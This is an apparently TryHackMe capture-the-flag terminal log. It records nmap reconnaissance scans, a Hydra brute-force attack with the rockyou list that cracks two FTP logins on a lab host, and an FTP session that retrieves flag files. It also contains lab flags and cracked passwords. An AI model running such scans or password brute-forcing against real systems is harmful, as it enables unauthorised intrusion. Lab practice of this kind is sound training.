Net Sec Challenge

┌──(kali㉿kali)-[~]
└─$ nmap -p- 10.10.145.168  
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-30 20:57 EDT
Nmap scan report for 10.10.145.168
Host is up (0.19s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
8080/tcp  open  http-proxy
10021/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 821.01 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 10.10.145.168
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-30 21:18 EDT
Stats: 0:13:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.75% done; ETC: 21:32 (0:00:28 remaining)
Stats: 0:14:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 21:33 (0:00:00 remaining)
Nmap scan report for 10.10.145.168
Host is up (0.19s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         (protocol 2.0)
80/tcp    open  http        lighttpd
139/tcp   open  netbios-ssn Samba smbd 4
445/tcp   open  netbios-ssn Samba smbd 4
8080/tcp  open  http        Node.js (Express middleware)
10021/tcp open  ftp         vsftpd 3.0.5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port22-TCP:V=7.95%I=7%D=7/30%Time=688AC7D7%P=x86_64-pc-linux-gnu%r(NULL
SF:,2A,"SSH-2\\.0-OpenSSH_8\\.2p1\\x20THM{946219583339}\\x20\\r\\n");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 873.72 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -A -p 80 10.10.145.168
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-30 21:36 EDT
Nmap scan report for 10.10.145.168
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd
|_http-title: Hello, world!
|_http-server-header: lighttpd THM{web_server_25352}
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 4 hops

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   65.96 ms  10.13.0.1
2   ... 3
4   189.43 ms 10.10.145.168

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.145.168 10021
Connected to 10.10.145.168.
220 (vsFTPd 3.0.5)
Name (10.10.145.168:kali): eddie
331 Please specify the password.
Password: 
ls530 Login incorrect.
ftp: Login failed

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.145.168 10021
Connected to 10.10.145.168.
220 (vsFTPd 3.0.5)
Name (10.10.145.168:kali): quinn
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed

┌──(kali㉿kali)-[~]
└─$ hydra -L username.txt -P rockyou.txt 10.10.145.168 ftp -s 10021   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2025-07-30 21:45:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:14344399), ~1793050 tries per task
[DATA] attacking <ftp://10.10.145.168:10021/>
[10021][ftp] host: 10.10.145.168   login: eddie   password: jordan
[10021][ftp] host: 10.10.145.168   login: quinn   password: andrea
1 of 1 target successfully completed, 2 valid passwords found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2025-07-30 21:46:17

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.145.168 10021
Connected to 10.10.145.168.
220 (vsFTPd 3.0.5)
Name (10.10.145.168:kali): eddie
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||30730|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||30534|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> 
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.145.168 10021
Connected to 10.10.145.168.
220 (vsFTPd 3.0.5)
Name (10.10.145.168:kali): quinn
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||30187|)
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002           18 Sep 20  2021 ftp_flag.txt
226 Directory send OK.
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
229 Entering Extended Passive Mode (|||30388|)
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
100% |******************************************|    18       11.24 KiB/s    00:00 ETA
226 Transfer complete.
18 bytes received in 00:00 (0.09 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~]
└─$ cat ftp_flag.txt                         
THM{321452667098}

┌──(kali㉿kali)-[~]
└─$ nmap -sN 10.10.145.168
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-30 22:26 EDT
Nmap scan report for 10.10.145.168
Host is up (0.19s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
139/tcp  open|filtered netbios-ssn
445/tcp  open|filtered microsoft-ds
8080/tcp open|filtered http-proxy

Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds

{2DCC4AF9-496D-482F-AAEA-15015772EE76}.png